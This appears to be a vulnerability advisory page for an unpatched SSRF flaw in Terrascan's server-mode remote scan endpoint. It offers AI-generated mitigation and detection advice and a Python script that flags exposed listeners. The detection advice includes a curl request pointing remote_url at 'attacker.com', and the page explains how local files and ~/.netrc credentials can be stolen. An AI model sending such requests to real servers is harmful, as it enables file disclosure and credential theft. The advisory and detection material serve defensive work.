CVE-2026-47357
Server-Side Request Forgery in Terrascan
Publication date: 2026-05-19
Last updated on: 2026-05-20
Assigner: Tenable Network Security, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| tenable | terrascan | up to 1.18.3 (inclusive) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-610 | The product uses an externally controlled name or reference that resolves to a resource that is outside of the intended control sphere. |
| CWE-73 | The product allows user input to control or influence paths or file names that are used in filesystem operations. |
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided context does not explicitly describe how the CVE-2026-47357 vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.
What immediate steps should I take to mitigate this vulnerability?
Terrascan versions v1.18.3 and prior are vulnerable and no patch will be released since the project was archived in August 2023.
To mitigate this vulnerability, you should stop running Terrascan in server mode, especially if it is bound to 0.0.0.0 with no authentication.
Consider removing or restricting access to the vulnerable endpoint (POST /v1/{iac}/{iacVersion}/{cloud}/remote/dir/scan) that accepts the remote_url parameter.
Implement network-level controls such as firewall rules to block untrusted external access to the Terrascan server.
Since no patch is available, migrating to alternative tools or scanning methods that do not expose this vulnerability is recommended.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability affects Terrascan running in server mode (terrascan server) versions v1.18.3 and prior, which bind to 0.0.0.0 with no authentication and accept POST requests to the remote directory scan endpoint.
To detect if your system is vulnerable, you can check if Terrascan server is running and listening on network interfaces without authentication.
You can use network scanning commands to identify if the Terrascan server is exposed:
- Use `netstat` or `ss` to check for Terrascan server listening ports (default or configured):
  - `netstat -tulnp | grep terrascan`
  - `ss -tulnp | grep terrascan`
You can also attempt to send a crafted POST request to the vulnerable endpoint to test if the server responds without authentication:
- `curl -X POST http://<terrascan-server-ip>:<port>/v1/<iac>/<iacVersion>/<cloud>/remote/dir/scan -d '{"remote_url":"http://attacker.com/malicious","remote_type":"http"}' -H 'Content-Type: application/json' -v`
If the server responds and processes the request, it indicates the vulnerability is present.
Note: Since Terrascan was archived and no patch will be released, consider disabling or isolating the server mode to mitigate risk.
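Added example (not from this page or the Terrascan project): a Python check that parses `ss -tulnp` output and flags Terrascan listeners bound to a wildcard address, which is the exposed configuration the answer above describes. The sample output, process names and port numbers are constructed for the example; they are not Terrascan defaults.

```python
import re

# Constructed sample of `ss -tulnp` output for this example; not captured
# from a real host. Port numbers are placeholders, not Terrascan defaults.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53    0.0.0.0:*         users:(("systemd-resolve",pid=612,fd=13))
tcp   LISTEN 0      4096   0.0.0.0:9010        0.0.0.0:*         users:(("terrascan",pid=2291,fd=7))
tcp   LISTEN 0      128    127.0.0.1:9011      0.0.0.0:*         users:(("terrascan",pid=2315,fd=7))
tcp   LISTEN 0      4096   [::]:9012           [::]:*            users:(("terrascan",pid=2340,fd=7))
tcp   LISTEN 0      128    *:22                *:*               users:(("sshd",pid=901,fd=3))
"""

# Local addresses that mean "every interface"; a Terrascan server bound to
# one of these is reachable from the network, which is the exposed case.
WILDCARD_ADDRS = {"0.0.0.0", "[::]", "*"}
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def parse_listeners(ss_output):
    """Parse `ss -tulnp` lines into dicts for sockets in LISTEN state."""
    listeners = []
    for line in ss_output.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 7 or fields[1] != "LISTEN":
            continue
        addr, port = fields[4].rsplit(":", 1)        # "[::]:9012" -> "[::]", "9012"
        match = PROC_RE.search(fields[6])
        if not match:
            continue
        listeners.append({"proto": fields[0], "addr": addr, "port": int(port),
                          "process": match.group(1), "pid": int(match.group(2))})
    return listeners


def exposed_terrascan_listeners(ss_output, process_name="terrascan"):
    """Return Terrascan listeners bound to a wildcard address, sorted by port."""
    hits = [l for l in parse_listeners(ss_output)
            if l["process"] == process_name and l["addr"] in WILDCARD_ADDRS]
    return sorted(hits, key=lambda l: l["port"])


if __name__ == "__main__":
    for hit in exposed_terrascan_listeners(SAMPLE_SS_OUTPUT):
        print(f"EXPOSED: pid={hit['pid']} {hit['addr']}:{hit['port']} "
              "(terrascan server on all interfaces, no patch available)")
```

On a live host, feed the real output in with `subprocess.run(["ss", "-tulnp"], capture_output=True, text=True).stdout`; the loopback-only listener (127.0.0.1) is deliberately not flagged because it is not reachable from the network.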
Can you explain this vulnerability to me?
Terrascan versions 1.18.3 and earlier have a Server-Side Request Forgery (SSRF) vulnerability in the remote directory scan endpoint when running in server mode. An unauthenticated attacker can supply a malicious HTTP URL via the remote_url parameter, which is passed without validation to the hashicorp/go-getter library. This library supports a response header that allows redirection to local file URLs, enabling the attacker to read local files. Additionally, the library reads credentials from the user's ~/.netrc file and sends them to attacker-controlled hosts. This vulnerability affects Terrascan servers bound to all network interfaces without authentication.
How can this vulnerability impact me?
This vulnerability can allow an attacker to read local files on the server running Terrascan, potentially exposing sensitive information. Furthermore, the attacker can obtain credentials stored in the ~/.netrc file and send them to malicious hosts, leading to credential theft. Since the server runs without authentication and listens on all interfaces, it is exposed to remote exploitation.